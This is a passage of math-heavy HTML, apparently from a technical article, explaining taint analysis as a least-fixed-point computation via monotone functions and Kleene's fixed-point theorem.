style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∧</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟹</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span></span></span></span>),
and antisymmetric (since <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mi>X</mi><mi>i</mi></msub><mo>⊆</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup><mo>∧</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup><mo>⊆</mo><msub><mi>X</mi><mi>i</mi></msub><mtext>  </mtext><mo>⟹</mo><mtext>  </mtext><msub><mi>X</mi><mi>i</mi></msub><mo>=</mo><msubsup><mi>X</mi><mi>i</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msubsup></mrow><annotation encoding="application/x-tex">X_i \subseteq X'_i \land X'_i \subseteq X_i \implies X_i = X'_i</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222em"></span><span class="mbin">∧</span><span class="mspace" style="margin-right:0.2222em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊆</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟹</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.8333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0106em;vertical-align:-0.2587em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.7519em"><span style="top:-2.4413em;margin-left:-0.0785em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2587em"><span></span></span></span></span></span></span></span></span></span>).</p>
<p>A function <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is monotone over the partial order <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo>⊑</mo></mrow><annotation encoding="application/x-tex">\sqsubseteq</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.7719em;vertical-align:-0.136em"></span><span class="mrel">⊑</span></span></span></span> if, for all <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span> and <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mover accent="true"><msup><mi>X</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\overline{X'}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8833em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6779em"><span style="top:-2.989em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span></span></span></span>,</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mrow><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo>⊑</mo><mover accent="true"><msup><mi>X</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo stretchy="true">‾</mo></mover><mtext>  </mtext><mo>⟹</mo><mtext>  </mtext><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo><mo>⊑</mo><mi>F</mi><mo stretchy="false">(</mo><mover accent="true"><msup><mi>X</mi><mo mathvariant="normal" lspace="0em" rspace="0em">′</mo></msup><mo stretchy="true">‾</mo></mover><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X} \sqsubseteq \overline{X'} \implies F(\overline{X}) \sqsubseteq F(\overline{X'})</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0193em;vertical-align:-0.136em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.9073em;vertical-align:-0.024em"></span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6779em"><span style="top:-2.989em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⟹</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.6779em"><span style="top:-2.989em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">′</span></span></span></span></span></span></span></span></span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="mclose">)</span></span></span></span></span>
<p>What does this say? It means that "larger" or equal inputs lead to "larger" or equal outputs. Here, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is monotone because applying the propagation rules to a "larger" or equal set of
"current" tainted variables yields a "larger" or equal set of new tainted variables . To see this, consider that once a variable is marked as tainted, it remains tainted,
while an untainted variable can become tainted with the discovery of new tainted variables.</p>
<p>This ensures that repeating <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> will progressively increase the set of reachable expressions towards convergence at the least fixed point, so this provides us with a way to
compute the least fixed point of <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span>.</p>
<p>Formally, this is Kleene's fixed-point theorem. The least fixed point of the monotonic function <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is the limit of the ascending chain obtained by applying <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> repeatedly
starting from the least element <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi mathvariant="normal">⊥</mi></mrow><annotation encoding="application/x-tex">\bot</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6944em"></span><span class="mord">⊥</span></span></span></span> (here, the empty set):</p>
<span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML" display="block"><semantics><mtable rowspacing="0.25em" columnalign="right" columnspacing=""><mtr><mtd><mstyle scriptlevel="0" displaystyle="true"><mrow><mtext>lfp</mtext><mo stretchy="false">(</mo><mi>F</mi><mo stretchy="false">)</mo><mo>=</mo><munder><mo>⋁</mo><mrow><mi>n</mi><mo>≥</mo><mn>0</mn></mrow></munder><msup><mi>F</mi><mi>n</mi></msup><mo stretchy="false">(</mo><mi mathvariant="normal">⊥</mi><mo stretchy="false">)</mo></mrow></mstyle></mtd></mtr></mtable><annotation encoding="application/x-tex">\begin{align*}
\text{lfp}(F) = \bigvee_{n \geq 0} F^n(\bot)
\end{align*}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:2.7123em;vertical-align:-1.1061em"></span><span class="mord"><span class="mtable"><span class="col-align-r"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.6061em"><span style="top:-3.6061em"><span class="pstrut" style="height:3.05em"></span><span class="mord"><span class="mord text"><span class="mord">lfp</span></span><span class="mopen">(</span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span><span class="mop op-limits"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.05em"><span style="top:-1.8829em;margin-left:0em"><span class="pstrut" style="height:3.05em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">n</span><span class="mrel mtight">≥</span><span class="mord mtight">0</span></span></span></span><span style="top:-3.05em"><span class="pstrut" style="height:3.05em"></span><span><span class="mop op-symbol large-op">⋁</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.3623em"><span></span></span></span></span></span><span class="mspace" style="margin-right:0.1667em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.7144em"><span style="top:-3.113em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">n</span></span></span></span></span></span></span></span><span class="mopen">(</span><span class="mord">⊥</span><span class="mclose">)</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:1.1061em"><span></span></span></span></span></span></span></span></span></span></span></span>
<p>where <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msup><mi>F</mi><mi>i</mi></msup></mrow><annotation encoding="application/x-tex">F^i</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.8247em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8247em"><span style="top:-3.063em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span></span></span></span></span></span></span></span> is the <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>i</mi></mrow><annotation encoding="application/x-tex">i</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6595em"></span><span class="mord mathnormal">i</span></span></span></span>-fold composition of <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> with itself, and <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mo>⋁</mo></mrow><annotation encoding="application/x-tex">\bigvee</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em"></span><span class="mop op-symbol small-op" style="position:relative;top:0em">⋁</span></span></span></span> denotes the least upper bound.</p>
<p>To see this, consider the sequence <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mn>0</mn></msub><mo>=</mo><mi mathvariant="normal">⊥</mi></mrow><annotation encoding="application/x-tex">\overline{X}_0 = \bot</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:0.6944em"></span><span class="mord">⊥</span></span></span></span>, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mrow><mi>i</mi><mo>+</mo><mn>1</mn></mrow></msub><mo>=</mo><mi>F</mi><mo stretchy="false">(</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>i</mi></msub><mo stretchy="false">)</mo></mrow><annotation encoding="application/x-tex">\overline{X}_{i+1} = F(\overline{X}_i)</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0917em;vertical-align:-0.2083em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathnormal mtight">i</span><span class="mbin mtight">+</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.2083em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.1333em;vertical-align:-0.25em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span><span class="mopen">(</span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3117em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mathnormal mtight">i</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mclose">)</span></span></span></span>.</p>
<p>Since <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mi>F</mi></mrow><annotation encoding="application/x-tex">F</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.6833em"></span><span class="mord mathnormal" style="margin-right:0.13889em">F</span></span></span></span> is monotone, we have <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mn>0</mn></msub><mo>⊑</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mn>1</mn></msub><mo>⊑</mo><mo>⋯</mo><mo>⊑</mo><msub><mover accent="true"><mi>X</mi><mo stretchy="true">‾</mo></mover><mi>n</mi></msub></mrow><annotation encoding="application/x-tex">\overline{X}_0 \sqsubseteq \overline{X}_1 \sqsubseteq \cdots \sqsubseteq \overline{X}_n</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8833em"><span style="top:-3em"><span class="pstrut" style="height:3em"></span><span class="mord"><span class="mord mathnormal" style="margin-right:0.07847em">X</span></span></span><span style="top:-3.8033em"><span class="pstrut" style="height:3em"></span><span class="overline-line" style="border-bottom-width:0.04em"></span></span></span></span></span></span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.3011em"><span style="top:-2.55em;margin-right:0.05em"><span class="pstrut" style="height:2.7em"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight">0</span></span></span></span><span class="vlist-s">​</span></span><span class="vlist-r"><span class="vlist" style="height:0.15em"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2778em"></span><span class="mrel">⊑</span><span class="mspace" style="margin-right:0.2778em"></span></span><span class="base"><span class="strut" style="height:1.0333em;vertical-align:-0.15em"></span><span class="mord"><span class="mord overline"><span class="vlist-t"><span 